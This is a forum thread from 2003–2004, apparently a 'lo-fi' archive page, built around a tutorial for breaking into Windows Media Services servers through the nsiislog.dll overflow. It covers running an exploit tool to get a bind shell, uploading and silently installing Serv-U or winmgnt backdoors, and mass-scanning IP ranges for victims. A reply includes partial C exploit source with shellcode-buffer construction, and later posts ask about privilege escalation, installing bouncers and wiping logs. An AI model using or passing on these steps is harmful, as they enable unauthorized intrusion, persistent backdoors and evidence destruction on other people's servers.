ok Here we go: _______________ What you need: asd.exe media ip _______________
Ok first download asd.exe you can find it @ hxxp://www.geocities.com/mach8442000/asd.zip
Ok here we go.
Step 1) Open Msdos and typ cd\ (enter) than typ asd ip you wanna hack 34816 (enter) if he says exploited than he is online and maybe hackable! Than typ telnet ip that you wanna hack 34816 (enter) if you get in you will see
If not than take a other ip!
Step 2) So you are in the machine. Well typ now cd\ (enter) than cd inetpub\scripts (enter) why i do that? because you only can up in c:\inetpub\scripts. Now you need to up your files. I don't know wich program you use winmgnt.exe or servudaemon.exe but thats up to you. ------------------------------------------------------------------------------------------- Ok i suppose that you guys know how to up the files if not tell me i make a tut for it! -------------------------------------------------------------------------------------------
Ok when you upped your files typ: c:\inetpub\scripts\servudaemon.exe /i /h /s (i suppose that u upped servudaemon.exe if you upped winmngt.exe command: c:\inetpub\scripts\winmgnt.exe /i /h /s .) When you did that do this command: start servudaemon or start winmgnt AND HOPPA YOU HACKED IT! Try to login, if he says connection refused there is a router or something.
ONE POINT: When you make a typ mistake you can't remove the mistake so you guys know it! Than you must typ it again.
Good luck
Kyo...
Lostuse
Sep 9 2003, 12:04 AM
nice tut but i cant figure out how to get the files up there i cant start up ftp -i -s:c: to get the files it gives me an error
Nostra
Sep 12 2003, 01:58 AM
nice tut, but it┤s wrong that you can upload the files only to inetpub\scrits or recycler... in winnt\temp for example you can upload too... I mostenly make a dir like winnt\temp\system32\cgi-bin\admin or something simmilar
SLiM577
Sep 9 2003, 02:32 AM
is there a media scanner out there?
flap
Sep 9 2003, 06:01 AM
dont forget c:\recycler ... but however... till today i haven't sploited a media box with enough right to install a service and net start 'em... so i am very curious how u are able to do it
thavirus
Sep 9 2003, 12:31 PM
u can upload your files but you cant install your serv-u because you don't have the rights! Starting standalone files will work, like bouncer.exe!
greetz
flap
Sep 9 2003, 01:56 PM
yeah i know... always has been the prob with wms... but i am just curious.. how can somebody write a tutorial about something that is impossible to do ... lil weird to me
Iltis
Sep 9 2003, 02:33 PM
you have to gain adminstrator rights wih a local root exploit
so sry Kyoshichou your tut isn't really good althaugh evereything is correct
greetz Iltis
Steffan
Sep 9 2003, 04:58 PM
Is there a source code out there from this tool ????
I would like to have it...
THX a lot !!и
C'ya
Kyoshichou
Sep 9 2003, 05:39 PM
everthing is allright but you're right too; you have to be able to execute
void usage(char* argv[]) { printf("Dicklamer (: " "We are not responsible for the illegal use of this software.\n" "Description: Binds shell to port 34816 (or higher if port busy).\n" "Usage: " "%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n" "Supported target(s):\n" "Windows version\t\t\t\tnsiislog.dll version\n" "------------------------------------------------------------\n" "2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]); exit(0); }
int main(int argc, char* argv[]) { #ifdef WIN32 WSADATA wsaData; #endif int target_port = 80; char *nsiislog = nsiislog_default; int nArgIndex;
if (argc<2) usage(argv); nArgIndex = 1; while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-')) { switch (argv[nArgIndex++][1]) { case 'p': case 'P': target_port = atoi(argv[nArgIndex++]); continue; case 'r': case 'R': nsiislog = argv[nArgIndex++]; continue; default: usage(argv); } }
try { #ifdef WIN32 WSAStartup(0x0101, &wsaData); #endif SOCKET s = socket(AF_INET,SOCK_STREAM,0); if (s == INVALID_SOCKET) throw("No socket"); sockaddr_in addr;
//.п।ел塞 др св к ULONG iaddr = inet_addr(argv[1]); if (iaddr == INADDR_NONE) {//.др - имяерк hostent *ph = gethostbyname(argv[1]); if (!ph) throw("Cant resolve hostname"); memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr)); } else {//.др - IP memcpy(&addr.sin_addr.s_addr,&iaddr,4); };
addr.sin_family = AF_INET; addr.sin_port = htons(target_port); int sizeofaddr=sizeof(addr);
char *req = "MX_STATS_LogLine: "; strcpy(sploit, req); memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req)); //memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*у т\0*/); memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*у т\0*/); //прпероде н EIP, EBX б㤥тк зытн подний DWORD н 襣о з пр , где JZ/JNZ memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);
Ok when you upped your files typ: c:\inetpub\scripts\servudaemon.exe /i /h /s (i suppose that u upped servudaemon.exe if you upped winmngt.exe command: c:\inetpub\scripts\winmgnt.exe /i /h /s .)
wtf is that /i /h /s bullshit mix?
i know what everything does ALONE but all together???
hmmm just for the record got 3 iismedia shells till today
1 with system rights 2 with iusr rights tried iiscrack aka httpodbc.dll and system is patched :/ didnt had luck with other escalation tools... anyone got a usefull tool?
ismael86
Jan 4 2004, 02:24 PM
i get Target Exploited but when i connect with telnet to port 34816 it does not connect?
GhostCow
Jan 4 2004, 07:15 PM
if you got standalone execution option, then execute winshell for admin cmd shell... (i think its admin, it always worked for me)
HotN0b0dy
Jan 4 2004, 08:01 PM
may i ask..how can i gain target IP? are there any scanners? if there are..can u tell me their names? i'll try to find them alone first..then i'll ask u
headbanger
Jan 4 2004, 08:15 PM
QUOTE (HotN0b0dy @ Jan 4 2004, 08:01 PM)
may i ask..how can i gain target IP? are there any scanners? if there are..can u tell me their names? i'll try to find them alone first..then i'll ask u
scan1000 scans media.. but u wont get very far with media results because most of the time u dont have enough rights.
search for scan1000 on this board or on google.
HotN0b0dy
Jan 4 2004, 09:07 PM
yes downloaded it from this board i ran it..but it opens, and letters write down, and then it closes
killpart
Jan 4 2004, 09:41 PM
why all so comply. scan with scan100/scan500/scan1000 -media the results exploit i with a tool. this results i use a prog who connect per shel and i can send my script.
HotN0b0dy
Jan 4 2004, 09:57 PM
somethin' about security can be anything wrong if i scan from my local computer? cuz i'm doing this 1st time..so i'm not sure and can u tell me few ranges that u scan? what range has china? Thank You p.s: i figured out how to scan..i think so
headbanger
Jan 5 2004, 12:41 AM
QUOTE (HotN0b0dy @ Jan 4 2004, 09:07 PM)
yes downloaded it from this board i ran it..but it opens, and letters write down, and then it closes
you need to open it through cmd.exe
goto start--run and type cmd
then goto where scan1000 is located
then type scan1000 -media ipstart ipend ..
tstngry
Jan 5 2004, 04:08 AM
What prog should i use to compile this? I tried dev c++ but i get errors. I would appreciate some suggestions. Thnx in advance
thotho
Jan 5 2004, 06:28 AM
thanks 4 the Tutorial
HotN0b0dy
Jan 5 2004, 01:48 PM
so there's nothin wrong if i scan from my home computer?
zarp
Jan 5 2004, 02:36 PM
mm from your pc isn t a pb ;p lol
i have scan remotly and i have found some targets but after asd ip 34816 never any telnet which is ok :/
maybe bad range lol or fuckingfirewall or patch
HotN0b0dy
Jan 5 2004, 03:34 PM
yeah..i suppose pb means preety bad. damn...forget this 1337 speech and write normal pls thx
headbanger
Jan 5 2004, 10:44 PM
QUOTE (CraZy_A @ Sep 10 2003, 11:56 PM)
QUOTE (Kyoshichou @ Sep 8 2003, 05:09 PM)
Ok when you upped your files typ: c:\inetpub\scripts\servudaemon.exe /i /h /s (i suppose that u upped servudaemon.exe if you upped winmngt.exe command: c:\inetpub\scripts\winmgnt.exe /i /h /s .)
wtf is that /i /h /s bullshit mix?
i know what everything does ALONE but all together???
hmmm just for the record got 3 iismedia shells till today
1 with system rights 2 with iusr rights tried iiscrack aka httpodbc.dll and system is patched :/ didnt had luck with other escalation tools... anyone got a usefull tool?
the /i /h /s is just so it would be hidden and not pop up the ftp server gui
its useless if u use winmgnt.exe because it does it automatically
cha0s
Jan 6 2004, 11:56 AM
thx 4 this xpl checking it after scan is complete
HotN0b0dy
Jan 6 2004, 04:42 PM
re i'd like to ask..how can i upload and run bnc on that kind of shells taiwan shells are also 'hackable' i found out pls help me thx
Kaarel
Jan 6 2004, 10:52 PM
Anybody can say how do secure media and how to delete logs on media (I know that in media isnt admin right but meyby there is some way to do that)
HotN0b0dy
Jan 8 2004, 08:09 PM
i'd just like to ask once again, if anyone knows how to upload bnc on media box? i'd really aprechiate your help ty
B1G
Feb 25 2004, 06:26 PM
what about logs on the target machine?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.